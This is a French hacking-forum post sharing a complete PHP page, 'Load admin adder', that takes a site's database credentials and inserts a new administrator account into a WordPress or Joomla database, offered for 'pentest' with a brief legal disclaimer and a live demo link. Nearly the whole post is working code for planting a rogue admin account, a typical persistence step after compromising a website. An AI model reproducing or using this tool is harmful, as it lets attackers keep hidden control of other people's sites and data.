Voilà un petit script utile à tous pour vos test personnels ou de pentest
=>
Code :
<html>
<head>
<title>Load admin adder</title>
<center><img src="http://n-pn.fr/images/logo.png"></center> <style type="text/css">
body,root{
background: #3D3D3D;
font-family: sans-serif;
margin: 0; padding: 0;
}
#main{
width: 300px;
margin: 100px auto;
background: blue;
padding: 3px;
padding-bottom: 0px;
border-radius: 5px;
}
input{
border: 1px solid grey;
background: #ECECEC;
border-radius: 2px;
}
h1{
color: #ECECEC;
text-align: center;
margin:top: -5px;
}
#top{
height: 5px;
background: #ECECEC;
margin:0;
}
.failed { text-align: center; color: red;}
.success{ text-align: center; color: green;}
</style>
</head>
<div id="top"></div>
<h1>Load Admin Account </h1>
<?php
if(isset($_POST['dbhost'])&&($_POST['dbuser'])&&($_POST['dbpass'])&&($_POST['user'])&&($_POST['pass'])&&($_POST['type'])&&($_POST['dbprefix'])){
mysql_connect($_POST['dbhost'], $_POST['dbuser'], $_POST['dbpass'])or die("<p class='failed'>Databse error</p>");
mysql_select_db($_POST['dbname'])or die("<p class='failed'>Databse error</p>");
switch($_POST['type']){
case 'wordpress':
mysql_query("INSERT INTO wp_users VALUES('', '".mysql_real_escape_string($_POST['user'])."', '".md5($_POST['pass'])."', 'eduard', 'eduard@gmail.com', '', '', '', '0', 'eduard')")or die("<p class='failed'>".mysql_error()."</p>");
$id = mysql_result(mysql_query("SELECT id FROM ".mysql_real_escape_string($_POST['dbprefix'])."users WHERE user_login = '".mysql_real_escape_string($_POST['user'])."' "), 0);
mysql_query("INSERT INTO ".mysql_real_escape_string($_POST['dbprefix'])."usermeta VALUES('', '".$id."', 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}') ")or die("<p class='failed'>".mysql_error()."</p>");
echo'<p class="success">Account added with success</p>';
break;
case 'joomla':
mysql_query("INSERT INTO ".mysql_real_escape_string($_POST['dbprefix'])."users VALUES('', 'eduard', '".mysql_real_escape_string($_POST['user'])."', 'eduard@gmail.com', '".md5($_POST['pass'])."', 'deprecated', 0, 1, '', '', 0, 0)")or die("<p class='failed'>".mysql_error()."</p>");
$id = mysql_result(mysql_query("SELECT id FROM ".mysql_real_escape_string($_POST['dbprefix'])."users WHERE username='".mysql_real_escape_string($_POST['user'])."' "), 0);
mysql_query("INSERT INTO ".mysql_real_escape_string($_POST['dbprefix'])."user_usergroup_map VALUES('".$id."', 8 ) ")or die("<p class='failed'>".mysql_error()."</p>");
echo'<p class="success">Account added with success</p>';
break;
}
}?>
<div id="main">
<form method="post" action="">
<table>
<tr>
<td>CMS :</td>
<td><select name="type">
<option value="wordpress">WordPress</option>
<option value="joomla">Joomla</option>
</select></td>
<tr>
<td>Db Host:</td>
<td><input type="text" name="dbhost"></td>
</tr>
<tr>
<td>Db User:</td>
<td><input type="text" name="dbuser"></td>
</tr>
<tr>
<td>Db Pass:</td>
<td><input type="text" name="dbpass"></td>
</tr>
<tr>
<td>Db Name:</td>
<td><input type="t
ext" name="dbname"></td>
</tr>
<tr>
<td>Db pefix:</td>
<td><input type="text" name="dbprefix"></td>
</tr>
<tr>
<td>Login:</td>
<td><input type="text" name="user"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type="text" name="pass"></td>
</tr>
<tr>
<td colspan="2"><center><input type="submit"></center></td>
</tr>
</table>
</form>
</div>
<center></center>
</html>
<link rel="stylesheet" media="screen" type="text/css" title="design_encoder" href="style.css" />
<br/><br/>
<fieldset>
<legend>REMARQUE :</legend>
<p>Contenu : Vous devez impérativement avoir les droits du propriétaires pour utiliser ceci , sinon vous serrez en délit. Nous ne couvrons vos actes.</p>
</fieldset><br/><br/><br/>
LIVE DEMO :
http://french-dump.comoj.com/adder.php
Cordialement,
Accueil du forum
Tableau de bord
Liste des membres
Qui est en ligne?
Mon profil
Messages privés
Nouveau message
Recherche
Calendrier
Zine
URL de redirection
Créer un PasteBin
Classement (Top 100)
Proposez un challenge! 
Hacking
Hacking 
Spirit of hack
Messages: 32 816
Client IRC en ligne
